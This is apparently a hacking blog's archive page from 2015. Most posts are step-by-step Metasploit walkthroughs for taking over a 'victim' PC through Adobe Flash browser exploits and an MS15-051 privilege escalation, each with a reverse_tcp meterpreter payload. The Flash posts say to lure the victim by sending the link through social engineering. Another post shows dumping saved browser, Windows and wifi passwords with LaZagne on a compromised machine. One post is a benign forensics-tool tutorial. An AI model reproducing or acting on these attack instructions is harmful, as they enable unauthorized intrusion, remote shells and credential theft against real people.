Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

at 11:41 AM Tuesday, July 14, 2015 0 comments
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043

Exploit Targets
Windows 7
Windows 8
Firefox 38.0.5
Adobe Flash 18.0.0.160
Adobe Flash 11.2.202.466


Requirement
Attacker: kali Linux

Victim PC: Windows 7


Now type use exploit/multi/windows/browser/adobe_flash_nellymoser_bof
msf exploit (adobe_flash_nellymoser_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_nellymoser_bof)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (adobe_flash_nellymoser_bof)>set srvhost 192.168.0.125
msf exploit (adobe_flash_nellymoser_bof)>set uripath /
msf exploit (adobe_flash_nellymoser_bof)>exploit  


Now an URL you should give to your victim http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Labels: ,

Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption

at 11:03 PM Monday, July 13, 2015 0 comments
This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/windows/browser/adobe_flash_shader_drawing_fill
msf exploit (adobe_flash_shader_drawing_fill)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_shader_drawing_fill)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (adobe_flash_shader_drawing_fill)>set srvhost 192.168.0.125
msf exploit (adobe_flash_shader_drawing_fill)>set uripath /
msf exploit (adobe_flash_shader_drawing_fill)>exploit


Now an URL you should give to your victim http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Labels: ,

Forensics Investigon of RAW Images using Belkasoft Evidence Center

at 10:42 PM Sunday, July 12, 2015 0 comments
First of all, download the Belkasoft Evidence Center ultimate from this link.


Click on New Option to select the Raw Image.


Enter the Case Name.
Select the Root folder where Forensic Evidence will be created.
Then type the name of the investigator and Case Description. Click Ok.


Now select the Raw Image and Check the Option Analyze Data Source. Click on Next.


Now Select from supported data types and click on Next.


Now Select all and Click on Finish.


To visualize the cached sites exactly as seen by the user, Click on Cache in Browsers option


To see Downloaded file list, click on Downloaded Files.



To Check the List of Sites Visited by the user, select Sites Option.


To see Cookie List, Click on Cookies Option.



Now click on Documents option and Then Select Found Documents option to see all the office Documents files found in user pc


To see all the encrypted files, click on Found Encrypted files option.  It will detect   more than 150 types of encrypted files. It is also possible to decrypt all these encrypted files with in this product by installing Passware   kit Forensic integrated with Belkasoft Product.


To Find Picture List, Select Found Pictures in Pictures Option. To Detect Forgery in Picture.  Right click on Picture, Select Analyze Pictures and Click on Detect Forgery Tab.


To find the recent files opened by Acrobat Reader, Click on Adobe Acrobat Reader Recent Option.


To See Recent applications run by user, Click on Last Application and Paths in NTUSER.DAT Option. NTUSER.DAT is a registry file in Windows Operating System .Every user profile contains an NTUSER.DAT file.  It contains a unique Documents Folder, Start menu Configuration, Desktop properties and browsing history.


To see last Selected Files by the user, Click on Last Selected Files.


To check the recent files opened by user, Click on Recent files option.


To detect latest searches by the user, click on Searches option.


To find the latest accessed files by the user , click on Recently accessed documents.

Labels:

Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC

at 11:53 PM Saturday, July 11, 2015 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Now download LaZagne project from here and extract in your pc. You can find the lazagne.exe file in folder.

Now use the upload command to send a file to the target system.



Launch all modules type laZagne.exe all will dump all the passwords that it can find all saved password in Google chrome



You can see windows secret passwords


You can see all saved wifi profile passwords


Labels: ,

Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit

at 11:28 AM 0 comments
This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64..

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms15_051_client_copy_image
msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_051_client_copy_image)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (ms15_051_client_copy_image)>set session 1
msf exploit (ms15_051_client_copy_image)>exploit


Labels: ,
Subscribe to: Posts (Atom)